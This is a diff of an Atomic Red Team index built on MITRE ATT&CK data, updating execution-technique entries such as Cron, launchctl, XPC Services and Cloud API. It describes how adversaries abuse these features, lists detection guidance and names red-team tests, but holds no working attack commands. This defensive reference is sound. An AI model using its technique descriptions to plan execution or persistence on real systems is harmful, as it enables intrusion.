+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/007
+        external_id: T1059.007
+      - source_name: Apple About Mac Scripting 2016
+        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+          14, 2021.
+        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+      - source_name: MDSec macOS JXA and VSCode
+        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+          with VSCode Extensions. Retrieved April 20, 2021.
+        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+      - source_name: Microsoft JScript 2007
+        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+          ECMAScript …. Retrieved June 23, 2020.
+        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+      - source_name: Microsoft Windows Scripts
+        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+      - source_name: JScrip May 2018
+        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+      - source_name: NodeJS
+        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+        url: https://nodejs.org/
+      - source_name: SentinelOne macOS Red Team
+        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+          APIs Without Building Binaries. Retrieved July 17, 2020.'
+        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+      - source_name: SpecterOps JXA 2020
+        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+          2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: Red Canary Silver Sparrow Feb2021
+        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+          wings: Outing macOS malware before it takes flight. Retrieved April 20,
+          2021.'
+        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1059.007
     atomic_tests:
     - name: JScript execution to gather local computer information via cscript
@@ -42913,7 +43233,7 @@ execution:
         name: command_prompt
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -42971,9 +43291,8 @@ execution:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1559.002:
@@ -43065,7 +43384,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1559.002
     atomic_tests:
     - name: Execute Commands
@@ -43138,15 +43456,15 @@ execution:
         name: manual
   T1204.002:
     technique:
-      modified: '2023-04-21T12:22:19.740Z'
+      modified: '2024-09-25T20:50:34.876Z'
       name: 'User Execution: Malicious File'
       description: "An adversary may rely upon a user opening a malicious file in
         order to gain execution. Users may be subjected to social engineering to get
         them to open a file that will lead to code execution. This user action will
         typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
         Adversaries may use several types of files that require a user to execute
-        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
-        may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+        .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
         and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
         to increase the likelihood that a user will open and successfully execute
         a malicious file. These methods may include using a familiar naming convention
@@ -43174,7 +43492,7 @@ execution:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -43194,9 +43512,8 @@ execution:
         url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1204.002
     atomic_tests:
     - name: OSTap Style Macro Execution
@@ -43673,26 +43990,7 @@ execution:
         name: powershell
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -43709,6 +44007,7 @@ execution:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -43719,9 +44018,13 @@ execution:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -43729,8 +44032,24 @@ execution:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1559.001:
@@ -43770,7 +44089,7 @@ execution:
         description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
           Application COM Object. Retrieved November 21, 2017.
         source_name: Enigma MMC20 COM Jan 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-07-26T22:51:20.448Z'
       name: Component Object Model
       description: |-
         Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -43795,12 +44114,10 @@ execution:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
       x_mitre_remote_support: true
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -43880,11 +44197,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.002:
     technique:
-      modified: '2024-03-01T19:06:05.126Z'
+      modified: '2024-10-15T14:18:20.087Z'
       name: 'Command and Scripting Interpreter: AppleScript'
       description: |-
         Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -43944,12 +44260,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.002
     atomic_tests: []
   T1106:
     technique:
-      modified: '2023-10-13T16:01:07.538Z'
+      modified: '2024-09-12T15:25:57.058Z'
       name: Native API
       description: |-
         Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -44047,9 +44362,9 @@ execution:
           2021.
         url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
       - source_name: Microsoft Win32
         description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
           March 15, 2020.
@@ -44066,7 +44381,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1106
     atomic_tests:
     - name: Execution through API - CreateProcess
@@ -44147,14 +44461,14 @@ execution:
         cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1059.010:
     technique:
-      modified: '2024-04-10T16:05:22.456Z'
+      modified: '2024-04-28T15:58:48.119Z'
       name: AutoHotKey & AutoIT
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
         Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
 
-        These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+        These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
@@ -44163,7 +44477,7 @@ execution:
       - Liran Ravich, CardinalOps
       - Serhii Melnyk, Trustwave SpiderLabs
       - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
-      - Monty
+      - "@_montysecurity"
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -44200,11 +44514,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:44:20.143Z'
       name: Cloud API
       description: "Adversaries may abuse cloud APIs to execute malicious commands.
         APIs available in cloud environments provide various functionalities and are
@@ -44241,11 +44554,10 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       x_mitre_remote_support: false
@@ -44264,13 +44576,12 @@ execution:
         url: https://github.com/Azure/azure-powershell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -44349,12 +44660,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1059:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Command and Scripting Interpreter
       description: |-
         Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -44365,6 +44675,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -44375,16 +44686,16 @@ execution:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      - Office 365
-      - Azure AD
       - IaaS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
@@ -44415,9 +44726,6 @@ execution:
         url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059
     atomic_tests:
     - name: AutoIt Script Execution
@@ -44463,7 +44771,7 @@ execution:
         name: powershell
   T1609:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:25:45.507Z'
       name: Kubernetes Exec Into Container
       description: |-
         Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -44529,39 +44837,13 @@ execution:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1609
     atomic_tests: []
   T1569.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
-      type: attack-pattern
-      created: '2020-03-10T18:26:56.187Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569.001
-        url: https://attack.mitre.org/techniques/T1569/001
-      - source_name: Launchctl Man
-        url: https://ss64.com/osx/launchctl.html
-        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
-      - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
-        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
-          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
-        source_name: Sofacy Komplex Trojan
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-20T20:14:35.179Z'
       name: 'System Services: Launchctl'
       description: |
         Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -44570,6 +44852,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
         plist file on disk which can be monitored. Monitor for recently modified or
         created plist files with a significant change to the executable path executed
@@ -44582,19 +44865,42 @@ execution:
         are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
         or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
         the services are unloaded prior to deleting plist files."
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       - 'Service: Service Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+      created: '2020-03-10T18:26:56.187Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569/001
+        external_id: T1569.001
+      - source_name: Sofacy Komplex Trojan
+        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+        url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      - source_name: Launchctl Man
+        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+        url: https://ss64.com/osx/launchctl.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1569.001
     atomic_tests: []
   T1059.008:
@@ -44637,7 +44943,7 @@ execution:
         data, modify startup configuration parameters to load malicious system software,
         or to disable security features or logging to avoid detection.(Citation: Cisco
         Synful Knock Evolution)"
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T20:28:09.848Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Network Device CLI
       x_mitre_detection: |-
@@ -44653,72 +44959,75 @@ execution:
       x_mitre_remote_support: true
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1559.003:
     technique:
-      x_mitre_platforms:
-      - macOS
+      modified: '2024-10-16T16:14:12.793Z'
+      name: XPC Services
+      description: |-
+        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: execution
+      x_mitre_contributors:
+      - Csaba Fitzl @theevilbit of Kandji
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
-      x_mitre_contributors:
-      - Csaba Fitzl @theevilbit of Offensive Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Access'
+      x_mitre_remote_support: false
       type: attack-pattern
       id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
       created: '2021-10-12T06:45:36.763Z'
-      x_mitre_version: '1.0'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
-        external_id: T1559.003
         url: https://attack.mitre.org/techniques/T1559/003
+        external_id: T1559.003
       - source_name: creatingXPCservices
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
         description: Apple. (2016, September 9). Creating XPC Services. Retrieved
           April 19, 2022.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
       - source_name: Designing Daemons Apple Dev
-        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
         description: Apple. (n.d.). Retrieved October 12, 2021.
+        url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
       - source_name: CVMServer Vuln
-        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
         description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
           in macOS and iOS. Retrieved October 12, 2021.'
+        url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
       - source_name: Learn XPC Exploitation
-        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
         description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
           October 12, 2021.
-      x_mitre_deprecated: false
-      revoked: false
-      description: |-
-        Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service <code>C API</code> or the high level <code>NSXPCConnection API</code> in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
-        Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: XPC Services
-      x_mitre_detection: ''
-      kill_chain_phases:
-      - phase_name: execution
-        kill_chain_name: mitre-attack
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Process: Process Access'
-      x_mitre_remote_support: false
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1204:
     technique:
-      modified: '2024-04-12T03:46:49.507Z'
+      modified: '2024-11-11T18:52:12.103Z'
       name: User Execution
       description: |-
         An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
 
         While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
 
